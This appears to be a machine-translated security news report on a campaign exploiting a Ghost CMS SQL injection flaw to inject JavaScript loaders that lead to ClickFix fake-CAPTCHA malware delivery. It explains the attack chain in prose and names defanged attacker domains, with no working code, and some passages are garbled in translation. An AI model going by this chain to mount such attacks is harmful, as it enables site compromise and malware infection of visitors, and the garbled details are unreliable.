Threat actors are exploiting recently revealed critical security flaws in Ghost CMS to inject malicious JavaScript code in order to facilitate ClickFix attacks.
According to QiAnXin XLab, this activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), a SQL injection vulnerability in Ghost’s Content API that could allow an unauthenticated attacker to read arbitrary data from the database. This security flaw was resolved in version 6.19.1 in February 2026. This vulnerability was discovered by Anthropic using Claude.
The severity of this vulnerability is that it allows an attacker to gain unauthorized access to a site’s administrative API keys, giving them the ability to inject malicious code and compromise the site. You can use the admin API key to call the admin API and make changes to published articles directly in your content management system.
According to XLab, the attackers exploited the security flaw to “obtain the target site’s Admin API key without permission, modify articles in bulk using the Ghost Admin API, and inject a malicious JavaScript loader at the bottom of the page to facilitate a fake CAPTCHA attack.”
The activity has been described by the Chinese security vendor as a “massive poisoning” campaign weaponized by a flaw in Ghost CMS. At least two different threat clusters are assessed to be behind this campaign, which in some cases injects malicious code into specific sites within a day. It was first detected on May 7, 2026.
In total, more than 700 websites were compromised in this campaign, spanning universities, blockchain, artificial intelligence, software-as-a-service, security research, media, and financial technology. The fact that legitimate websites were compromised may make ClickFix attacks even more successful, XLab said.
The JavaScript code inserted at the bottom of the article acts as a two-stage loader that retrieves the main payload from an external domain (‘clo4shara’) at runtime.[.]This architecture provides greater flexibility by allowing threat actors to exchange payloads based on different criteria while keeping loader functionality intact across multiple compromised sites.
“Access clo4shara directly[.]”xyz/11z77u3.php reveals a piece of code, but it is actually a typical traffic distribution script. Its core functionality is to collect various fingerprint information from the user’s browser, upload it to a server, and perform actions such as redirects, pop-ups, and downloads based on the returned instructions,” XLab explained. The PHP script is powered by Adspect, a commercial cloaking service.
The idea behind the use of cloaking scripts is to ensure that security scanners and crawlers only see benign web pages, while ensuring that only actual victims are served with the actual payload. The script also supports 19 different commands that execute arbitrary JavaScript code and facilitate remote control of the victim’s browser.
Site visitors deemed to be the intended target are eventually served a fake CAPTCHA verification page within an iframe HTML element to prove they are human. This leads to the ClickFix attack, which involves copying Base64-encoded commands to run Windows.[ファイル名を指定して実行]You will be prompted to paste it into the dialog.
This command acts as a dropper to deliver a ZIP archive, from which to extract and run a Windows batch script. The script runs a PowerShell command to download a DLL file from a remote domain and launches it using ‘rundll32.exe’ to open a fake web page to the user for distraction purposes.
Subsequent iterations of the malware have been found to replace the DLL with a JavaScript payload. Regardless of the payload type, the ultimate goal of the attack is to drop a Windows executable file. For DLLs, the executable is a PuTTY client with a valid code signing certificate. The binary distributed via JavaScript is an Inno Setup installer for Electron applications.
This application is a modified version of the open-source Grape desktop client designed to achieve persistence and poll remote servers (“web-telegram”).[.]ug”) every 30 seconds to process commands issued by the attacker, such as running JavaScript code or executable files.
Ghost CMS users are encouraged to upgrade their instances to the latest version, rotate all credentials, clean the site, audit access logs for signs of suspicious activity, and notify users who may have visited the site during the exposure period about a possible breach.
Source link
